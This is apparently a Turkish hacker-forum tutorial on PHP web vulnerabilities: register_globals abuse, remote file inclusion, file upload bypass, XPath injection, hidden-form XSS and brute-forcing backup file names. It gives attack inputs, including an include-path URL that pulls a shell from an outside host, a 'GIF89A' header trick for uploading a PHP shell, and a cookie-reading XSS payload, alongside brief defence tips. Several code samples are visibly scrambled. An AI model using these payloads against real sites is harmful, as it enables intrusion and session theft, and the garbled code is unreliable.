<?php$is_admin =()if (isset($is_admin)) {//Admin Paneline Hoş Geldiniz![...]} else {yaptınız! [...] } ?>//Yanlış giriş
Register Global 0n olduğu zaman inputu şekillendirebildiğimize göre çok fazla sayıda açık türü meydana gelebilir.
Kod:
<?phpinclude "$path/kasva.php";?>
Örnek atak modülü:
Kod:
#http://127.0.0.1:80/index.php?path=http://shelliniz.org/?
[~] File Upload Vulnerability
Shell upload açıkları php sistemlerde dosya tiplerinin tam filtre edilememesinden kaynaklanır.
Sadece grafik uzantılı dosyaları upload eden bir uygulamaya kendi php kodlarımızı upload edebiliriz.
ÖRNEK
Kod:
<?php....ILES[’userfile’][’type’] != "image/gif") { ....if($_ F}?>
Ancak dosya uzantısı kontrol edilmiyor.Dosya türü ile uzantısı çok farklı terimlerdir.
Peki nasıl exploit ederiz?Cevap : php dosyamızı gif türünde yollarız:
Php dosyamızın ilk satırına:
"GIF89A" kodunu hepsi büyük harf olarak girmemiz gerekiyor.Küçük harflerle kabul olmaz.
Ve php dosyasının upload edildiğini göreceksiniz.
DEFANS
Dosya uzantılarını yasaklayarak filtre engeli koyabiliriz.
Kod:
$yasak = array(".php", ".phtml", ".php3", ".php4");
(.htaccess dosyası kullanarak ignore* yada deny all# komutları ile bunu yapabilirsiniz.)
En önemliside upload dosyalarına random isim verilmesini sağlayabiliriz.
Böylece php dosyaları upload edilse bile klasör yasak olduğundan ve ismide random olduğundan dosyayı görünteleyemeyecektir.
__________________________________________________ _____________
[~] XPath Injection (XML FUNCTIONS) Vulnerability
Xpath injection SQL Injectiona bir hayli benzeyen bir başka injection çeşididir.
SQL Injectionda SQL databaseye yapılan injection XPath Injectionda XML dosyasına yöneliktir.
Açığı tespit için ilk olarak XPath sorguları gönderen input alanları belirlemek gerekir.
ÖRNEK
Kod:
<?php$test = $_GET[’test’];if ($test){exml_load_file("kasva.xml"); $result = $$xml = simplxml->xpath($test);print_r($result); }?>
Şimdi bu xml dosyasına bakalım:
Kod:
<?xml version="1.0" encoding="UTF-8"?><note><to>kayra</to>ading>Mektup</head<from>kasva</from><heing><bOdy>Seni seviyorum kayra!</bOdy></note>
Evet php dosyamıza göre sorguları gönderelim:
Kod:
Index.php?test=from:#Array ( [0] => SimpleXMLElement Object ( [0] => kasva ) )ndex.php?test=*IleXMLElement Object ( [0] => kayra ) [1] => SimpleXMLElement Object ( [0] => kasva ) [2] => SimpleXMLEl#Array ( [0] => Simpement Object ( [0] => Reminder ) [3] => SimpleXMLElement Object ( [0] => Seni seviyorum kayra! ) )
__________________________________________________ _____________
[~] Hidden Form Manipulation Vulnerability
Bu tür bir açık hidden form alanlarını kullanıcı data geçişi için kullanan her web sayfasında meydana gelebilir.
Hidden form alanlarını manipule ederek c0de inject edebiliriz.Peki nasıl olur bu iş?
Bir çok web programcısı bu alanları kodlarken hidden formlarda bulunan inputları code injectionu engellemek için
"> < " ’" gibi karakterlerden filtrelerler.
Anak bu filtreme datanın hidden forma geçişinden önce olmalıdır.Yani:
DATA - HIDDEN FORM - FILTRE >Bu kullanım güvenlik zaafiyeti yaratır.
DATA - FILTRE - HIDDEN FORM >Güvenli kullanım.
Peki bu açıklar ne tür sayfalarda bulunur; örneğin multi geçişli admin sayflarında admin ismi hidden formlara geçiş yapar.
user-login-HIDDEN FORM-admin-login-HIDDEN FORM-yönetici
ÖRNEK
Örnek bir kullanıma bakalım:
Kod:
<form><input type="hidden" name="username" value="kasva" ></form>
Kod:
<form><input type="hidden" name="username" value="" >kasva"></form>
Ve şimdi xss codumuzu inject edelim:
"> <scr ipt>alert(docu ment.cookie)</script> <a href =" (sonuna kapatıcı tag koymuyoruz)
Bakalım:
Kod:
<form><input type="hidden" name="username" value=""><scr ipt>alert(********.cookie)</script><a name =""></form>
DEFANS
Hidden formlara filtresiz data geçişi yapmayınız!
__________________________________________________ _____________
[~] Backup Files Download Vulnerability
Fazla görülmesede can sıkıcı bir açıktır.
Acemi Web programcıları backup dosyalarını saklarken random olarak adlandırırlar.
ÖRNEK
Kod:
<?php$rnd = rand(1,100);$fp = fopen($rnd.’_backup_.sql’, ’w’);fwrite($fp, $db );fclose($fp);?>
ve 3. satırdada $rnd_backup_.sql ile bu backup dosyalarına atanıyor.
Bruteforce programı ile backup dosya ismini kolayca ele geçebiliriz
Fazla önemsenmeyen bir açık olmasına rağmen, önemli scriptlerde kendine yer buluyor:
Bakınız=> PHP-Fusion 6.00.105 Accessible Database Backups Download Vulnerable